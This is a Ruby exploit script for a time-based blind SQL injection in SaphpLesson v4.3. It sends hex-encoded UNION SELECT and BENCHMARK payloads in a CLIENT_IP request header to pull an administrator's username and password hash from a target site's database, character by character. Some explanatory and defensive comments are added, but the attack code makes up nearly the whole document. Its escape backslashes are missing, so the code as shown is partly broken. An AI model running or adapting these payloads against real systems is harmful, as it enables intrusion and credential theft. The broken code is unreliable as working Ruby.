# Title : Saphplesson 4.3 Remote Blind SQL Injection Exploit
# Published : 2009-09-16
# Author : Jafer Al Zidjali
#!/usr/bin/ruby
#=============================================#
# SaphpLesson v4.3 Exploit #
# Blind SQL Injection Vulnerability #
#---------------------------------------------#
# Date: 21-08-2009 #
# Discovered & written by: Jafer Al Zidjali #
# Email: jafer[at]scorpionds.com #
# Website: www.scorpionds.com #
#---------------------------------------------#
# Notes: #
# 1. Author has been notified #
# 2. A public patch has been released #
#=============================================#
require "net/http"
require "base64"
# Banner text handed to print_intro below. Presentation only: nothing
# touches the network until the interactive prompts further down.
intro=[
"+=============================================+",
"+ SaphpLesson v4.3 Exploit +",
"+ Blind SQL Injection Vulnerability +",
"+ Discovered & written by: Jafer Al Zidjali +",
"+ Email: jafer[at]scorpionds.com +",
"+ Website: www.scorpionds.com +",
"+=============================================+"
]
# Prints each line of `text` one character at a time, following every
# character with a rotating spinner glyph (|, /, -, then the fourth state)
# and sleeping 40 ms, then emits a trailing "b " and a newline per line.
#
# @param text [Array<String>] lines to animate
# @return [Array<String>] `text`, since each returns its receiver
#
# NOTE(review): the string literals in this block appear to have lost their
# escape backslashes during archival (the bare "\" on the `w=` line below
# swallows the closing quote), so as printed this method may not parse.
def print_intro text
w="|"
text.each do |str|
# One character per iteration; flush first so the animation is visible
# even when STDOUT is block-buffered.
str.scan(/./) do |c|
STDOUT.flush
if w=="|"
print "b"+c +w
w="/"
elsif w=="/"
print "b"+c +w
w="-"
elsif w=="-"
print "b"+c +w
w="\"
else
print "b"+c +w
w="|"
end
sleep 0.04
end
print "b "
puts ""
end
end
# Show the banner, then read the target host and script path from stdin.
# Both values are used verbatim as the Net::HTTP host and request path
# below; no validation or normalisation is applied to either.
print_intro intro
puts "nEnter host name (e.g. example.com):"
host=gets.chomp
puts "nEnter script path (e.g. /saphplesson/):"
path=gets.chomp
# Baseline timing: issue five plain GETs for `path` on port 80 and record
# the wall-clock duration of each (Time.now deltas, so clock adjustments
# and network jitter are included). A fresh Net::HTTP object is created
# per request, so each measurement includes TCP connection setup.
puts "nGetting average response time..."
avgTime=Array.new(5)
5.times do |c|
s=Time.now
http = Net::HTTP.new(host, 80)
resp= http.get(path)
# Body is read only to make sure the full response has arrived before
# the timer stops; the value itself is never used.
w=resp.body
avgTime[c]=Time.now-s
puts avgTime[c]
end
sum=0
5.times {|c| sum+=avgTime[c]}
avg=sum/5.0
# Despite the label, this prints 3 * avg — the value the later loops use
# as their "slow response" threshold — not the mean itself.
puts "Average response time is: #{avg*3.0}"
# Calibration: send five requests whose CLIENT_IP request header carries a
# fixed hex-encoded prefix with an increasing numeric `delay` interpolated
# into it, and print how long each response took. The injection vector is
# therefore a client-controlled request header, not a query parameter.
#
# Defensive note: server code that copies request headers such as
# CLIENT_IP into SQL must treat them as untrusted input (parameterised
# queries), and request logging / WAF inspection should cover non-standard
# headers, since the timing pattern seen here (response latency tracking a
# value supplied by the client) is the observable signal of this probing.
puts "nTesting delayed response time..."
delTime=Array.new(5)
5.times do |t|
# delay = 10,000,000 * (t+1), i.e. 1e7, 2e7, ... 5e7.
delay=1000000*((t+1)*10)
header={
"CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
"x20x49x46x28x31x3dx31x2cx42x45x4ex43x48x4dx41x52x4b"+
"x41x52x4bx28#{delay}x2cx63x68x61x72x28x63x68"+
"x61x72x28x32x29x29x29x2cx33x34x33x34x29x20x23x20"
}
s=Time.now
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
w=resp.body
s=Time.now-s
# Stores the delay value that was sent, not the measured time; the
# measured time is only printed.
delTime[t]=delay
puts "["+(t+1).to_s+"] #{s}"
end
# `sel` is a 1-based index into delTime, read as raw text and converted
# with to_i at each use site; it is not range-checked here.
puts "nChoose a delyed response time (it should be > average response time):"
sel=gets.chomp
# Length probe: for z = 0..19 send one request whose CLIENT_IP header has
# `z+1` and the user-selected delay (delTime[sel-1]) interpolated into the
# encoded payload. The first request whose response takes longer than
# 3 * avg is taken to mean "length == z+1"; if none does, ulen stays 0.
print "nGetting username length"
ulen=0
20.times do |z|
header={
"CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
"x20x49x46x28x6cx65x6ex67x74x68x28x28x73x65x6cx65x63x74"+
"x20x4dx6fx64x4ex61x6dx65x20x66x72x6fx6dx20x6dx6fx64x72"+
"x65x74x6fx72x20x77x68x65x72x65x20x4dx6fx64x49x44x3dx31"+
"x29x29x3d#{z+1}x2cx42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
"x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33x34x33x34x29x20x23x20"
}
s=Time.now
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
w=resp.body
s=Time.now-s
print "."
# Single timing sample per candidate; a slow response for any other
# reason (load, network) is indistinguishable from a hit.
if (s>(avg*3.0))
ulen=z+1
break;
end
# Flushed only on the non-hit path; the break above skips it.
STDOUT.flush
end
puts "nnUsername length: "+ ulen.to_s
# Character-by-character probe over `ulen` positions. For each position
# (z+1) every candidate in `chars` is tried in order; the candidate is
# printed, and if the response exceeds 3 * avg it is kept (inner loop
# breaks), otherwise "b" is printed before the next candidate. If no
# candidate for a position triggers the threshold, the last one tried
# remains on screen, so output is not self-validating.
puts "nnUsername: "
chars="abcdefghijklmnopqrstuvwxyz0123456789"
ulen.times do |z|
chars.scan(/./) do |c|
header={
"CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43"+
"x54x20x49x46x28x73x75x62x73x74x72x69x6ex67x28x28x73"+
"x65x6cx65x63x74x20x4dx6fx64x4ex61x6dx65x20x66x72x6f"+
"x6dx20x6dx6fx64x72x65x74x6fx72x20x77x68x65x72x65x20"+
"x4dx6fx64x49x44x3dx31x29x2c#{z+1}x2cx31x29x3dx27#{c}x27"+
"x2cx42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
"x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33"+
"x34x33x34x29x20x23x20"
}
s=Time.now
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
w=resp.body
s=Time.now-s
print c
if (s>(avg*3.0))
break;
end
print "b"
STDOUT.flush
end
end
# Same probe loop as the username block, but over a fixed 32 positions and
# a hexadecimal alphabet; a different column name is encoded in the header
# payload. Each candidate costs one HTTP request, so this phase issues up
# to 32 * 16 requests, and the same caveats apply: one timing sample per
# candidate and no marker when a position yields no hit.
puts "nnPassword hash: "
chars="0123456789abcdef"
32.times do |z|
chars.scan(/./) do |c|
header={
"CLIENT_IP" => "x27x20x55x4ex49x4fx4ex20x53x45x4cx45x43x54"+
"x20x49x46x28x73x75x62x73x74x72x69x6ex67x28x28x73x65x6c"+
"x65x63x74x20x4dx6fx64x50x61x73x73x77x6fx72x64x20x66x72"+
"x6fx6dx20x6dx6fx64x72x65x74x6fx72x20x77x68x65x72x65x20"+
"x4dx6fx64x49x44x3dx31x29x2c#{z+1}x2cx31x29x3dx27#{c}x27x2c"+
"x42x45x4ex43x48x4dx41x52x4bx28#{delTime[(sel.to_i)-1]}"+
"x2cx63x68x61x72x28x63x68x61x72x28x32x29x29x29x2cx33x34"+
"x33x34x29x20x23x20"
}
s=Time.now
http = Net::HTTP.new(host, 80)
resp= http.get(path,header)
w=resp.body
s=Time.now-s
print c
if (s>(avg*3.0))
break;
end
print "b"
STDOUT.flush
end
end